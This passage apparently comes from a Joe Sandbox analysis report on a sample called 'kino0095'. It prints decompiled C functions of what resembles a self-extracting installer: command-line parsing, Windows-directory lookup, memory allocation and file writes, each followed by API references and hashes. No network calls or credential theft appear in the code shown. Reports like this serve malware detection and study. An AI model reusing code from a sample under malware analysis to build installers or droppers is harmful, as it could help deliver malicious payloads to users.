                                                                                                                                                                                                                                    0x010b4b2f
                                                                                                                                                                                                                                    0x010b4b0f
                                                                                                                                                                                                                                    0x010b4b0f
                                                                                                                                                                                                                                    0x010b4b0f
                                                                                                                                                                                                                                    0x010b4b5e
                                                                                                                                                                                                                                    0x010b4ae9
                                                                                                                                                                                                                                    0x010b4aed
                                                                                                                                                                                                                                    0x010b4aed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010B369F
                                                                                                                                                                                                                                      • Part of subcall function 010B3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36B2
                                                                                                                                                                                                                                      • Part of subcall function 010B3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010B36DA
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010B4B05
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1084409-0
                                                                                                                                                                                                                                    • Opcode ID: c5d2871ce673295eb486db4ceed67bb76e6e263a65ef994a6cb0370c508c7667
                                                                                                                                                                                                                                    • Instruction ID: 376e0edd25fe2dd5c63b2023033b0446a90250bef64d8360861a59f2923637c6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5d2871ce673295eb486db4ceed67bb76e6e263a65ef994a6cb0370c508c7667
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A01C031200200ABD7248F18DCD5FE27B98FB44725F048226FBBAD71E5CB3A9911CB40
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x10b8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x10b8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E010B16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                    0x010b6592
                                                                                                                                                                                                                                    0x010b6594
                                                                                                                                                                                                                                    0x010b6596
                                                                                                                                                                                                                                    0x010b6598
                                                                                                                                                                                                                                    0x010b6598
                                                                                                                                                                                                                                    0x010b659b
                                                                                                                                                                                                                                    0x010b659b
                                                                                                                                                                                                                                    0x010b659d
                                                                                                                                                                                                                                    0x010b659e
                                                                                                                                                                                                                                    0x010b65a2
                                                                                                                                                                                                                                    0x010b65a4
                                                                                                                                                                                                                                    0x010b65a9
                                                                                                                                                                                                                                    0x010b65b2
                                                                                                                                                                                                                                    0x010b65b6
                                                                                                                                                                                                                                    0x010b65ba
                                                                                                                                                                                                                                    0x010b65c3
                                                                                                                                                                                                                                    0x010b65c5
                                                                                                                                                                                                                                    0x010b65c8
                                                                                                                                                                                                                                    0x010b65c8
                                                                                                                                                                                                                                    0x010b65c3
                                                                                                                                                                                                                                    0x010b65c9
                                                                                                                                                                                                                                    0x010b65cc
                                                                                                                                                                                                                                    0x010b65d2
                                                                                                                                                                                                                                    0x010b65d1
                                                                                                                                                                                                                                    0x010b65d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b65dc
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(010B8B3E,010B8B3F,00000001,010B8B3E,-00000003,?,010B60EC,010B1140,?), ref: 010B65BA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharPrev
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 122130370-0
                                                                                                                                                                                                                                    • Opcode ID: 0b6c73dc56140a7424f941ab2ab5edd383b7bb716807d3cd4e0de2d79b4f0178
                                                                                                                                                                                                                                    • Instruction ID: cc3434c472f77081ff969d170cfae6b5a8c000c8517b1d3d8a61ee3e64524bfd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b6c73dc56140a7424f941ab2ab5edd383b7bb716807d3cd4e0de2d79b4f0178
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FF042321042509BD331091D98C4BE7BFDDDB85150F1801AEE9DAC3245CA674D5583A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x10b8004; // 0x72151d89
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E010B597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010B44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x10b9124 = E010B6285();
					_t9 = 0;
				}
				return E010B6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                    0x010b6229
                                                                                                                                                                                                                                    0x010b6230
                                                                                                                                                                                                                                    0x010b6247
                                                                                                                                                                                                                                    0x010b626a
                                                                                                                                                                                                                                    0x010b6272
                                                                                                                                                                                                                                    0x010b6249
                                                                                                                                                                                                                                    0x010b6255
                                                                                                                                                                                                                                    0x010b625f
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6264
                                                                                                                                                                                                                                    0x010b6284

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010B623F
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                      • Part of subcall function 010B6285: GetLastError.KERNEL32(010B5BBC), ref: 010B6285
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 381621628-0
                                                                                                                                                                                                                                    • Opcode ID: 8216bd6f1e1df7a8e0509ecbdde250f101d7524bceffdb17591bead9dd0b2529
                                                                                                                                                                                                                                    • Instruction ID: ebe8ea47af3900743c52eff94ff02fac757b90795b2e5d4b6b96a47d17251a25
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8216bd6f1e1df7a8e0509ecbdde250f101d7524bceffdb17591bead9dd0b2529
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F0E2B0B00209ABE7A0EB748D81FFE33BCDB54700F4004AAA9C6D7081EE7A9D408750
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x10b8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x10b8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x10b8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x10b8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x10b8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x10b8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x10b8d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                    0x010b4b66
                                                                                                                                                                                                                                    0x010b4b74
                                                                                                                                                                                                                                    0x010b4b98
                                                                                                                                                                                                                                    0x010b4ba0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4bac
                                                                                                                                                                                                                                    0x010b4ba4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4ba4
                                                                                                                                                                                                                                    0x010b4b78
                                                                                                                                                                                                                                    0x010b4b7e
                                                                                                                                                                                                                                    0x010b4b84
                                                                                                                                                                                                                                    0x010b4b8a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010B4FA1,00000000), ref: 010B4B98
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: 19ef58917faaeab7c3ecf9f6f1327d6189308ab63518b313019ba84f7b80b191
                                                                                                                                                                                                                                    • Instruction ID: dcc4efff5521ab60f415a923c2fb1b0f63240edb661863b330d50437ce93a25b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ef58917faaeab7c3ecf9f6f1327d6189308ab63518b313019ba84f7b80b191
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF01231514B09AE8771AE29CC80ADABBEEAA952603108D2F95EFD2161E7346D41CB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                    0x010b66b1
                                                                                                                                                                                                                                    0x010b66ba
                                                                                                                                                                                                                                    0x010b66c7
                                                                                                                                                                                                                                    0x010b66bc
                                                                                                                                                                                                                                    0x010b66be
                                                                                                                                                                                                                                    0x010b66be

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,010B4777,?,010B4E38,?), ref: 010B66B1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                    • Opcode ID: ef5f0a0b436ca06e498b593936a97373340a9774afc9e0f0f85c5bdfe3808ef6
                                                                                                                                                                                                                                    • Instruction ID: a54fa6738d529ee0c888ebb6e4683a7b38b92a0fde3b9561eb5eae4f4e9a3687
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef5f0a0b436ca06e498b593936a97373340a9774afc9e0f0f85c5bdfe3808ef6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CB09276232440926A61063568AA5962881A6C123ABE81B90F076C11D4CA3FD846D104
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x010b4caa
                                                                                                                                                                                                                                    0x010b4cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000000,?), ref: 010B4CAA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                                    • Opcode ID: 44ffbb25b5b3d14e5ee04e9485c69cdb90423b4de9200a372716f53deb0594c5
                                                                                                                                                                                                                                    • Instruction ID: a207da434ff4729138ef6cdc3e5536f3778717e0789420096f8531c420ada8f1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ffbb25b5b3d14e5ee04e9485c69cdb90423b4de9200a372716f53deb0594c5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DB0123214420CF7CF101EC2E809FC53F1DE7C4761F140000F60C460408A7794108795
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                    0x010b4cc8
                                                                                                                                                                                                                                    0x010b4ccf

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                                                                                                    • Opcode ID: 664b42ce1d308e700cf6ed45f168826612fa8b4a61ff47a78ee5a12a17d38af4
                                                                                                                                                                                                                                    • Instruction ID: 274a755931343419aaca6e3369e6648a6416704a0cae3e55a77e8e02c18a00ba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 664b42ce1d308e700cf6ed45f168826612fa8b4a61ff47a78ee5a12a17d38af4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B0123100010CF78F101A42E8088853F1DD7C0360B000010F50C420118B3B98118684
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 010B5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E010B5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x10b8004; // 0x72151d89
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E010B6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E010B6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x10b8004; // 0x72151d89
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E010B597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E010B44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x10b9124 = E010B6285();
									_t75 = 0;
								}
								return E010B6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E010B44B9(0, 0x521, 0x10b1140, 0, 0x40, 0);
												_t85 =  *0x10b8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E010B667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E010B667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E010B5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E010B1680(0x10b8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E010B667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E010B667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x10b8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E010B5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x10b8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x10b8a3a;
																}
																E010B1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E010B658A(_t218, 0x104, 0x10b1140);
																if(E010B31E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x10b8a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x10b8a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x10b8a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x10b8a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x10b8a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
